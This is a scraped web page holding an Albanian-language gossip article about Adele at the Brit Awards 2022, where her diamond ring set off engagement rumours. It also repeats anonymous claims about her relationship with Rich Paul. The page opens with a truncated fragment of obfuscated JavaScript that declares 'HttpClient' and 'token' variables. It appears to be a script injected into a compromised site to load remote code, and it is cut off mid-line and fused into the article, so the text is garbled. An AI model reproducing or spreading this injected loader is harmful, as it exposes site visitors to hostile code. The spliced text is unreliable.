;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pas paraqitjes në ‘Brit Awards’ Adele ndez thashethemet për fejesë

By

Këngëtarja fituese e ‘Grammy’ Adele, po ndez thashethemet për fejesë pasi u pa në ‘Brit Awards 2022’ me një unazë diamanti në gishtin e saj të majtë të unazës.

Këngëtarja 33-vjeçare u paraqit në ceremoninë e ndarjes së çmimeve me një fustan të Giorgio Armani Privé që tërhiqte mjaft vëmendje.

Këngëtarja e hitit “Easy On Me” aktualisht është në lidhje menaxherin sportiv Rich Paul, që nga viti i kaluar.

Dyshja kohët e fundit kanë kaluar një ‘krizë’ në lidhjen e tyre, pasi Adele u pa “duke qarë dhe bërtitur” në telefon ndërsa përgatitej për turneun e saj të ardhshëm

“Adele ka qarë dhe nuk ka mundur të kalojë një provë të vetme të plotë për muajin e kaluar,” tha një burim i lidhur me ekipin menaxhues në Caesars Palace, ku do të zhvilloheshin shfaqjet.

“Vetëm vazhdimisht në telefon me Rich … duke bërtitur me zë të lartë dhe duke qarë”.

Dyshja janë në lidhje për rreth gjashtë muaj dhe u panë për herë të parë së bashku në ndeshjen e 5-të të finaleve të NBA 2021 verën e kaluar.

Artikuj të ngjashëm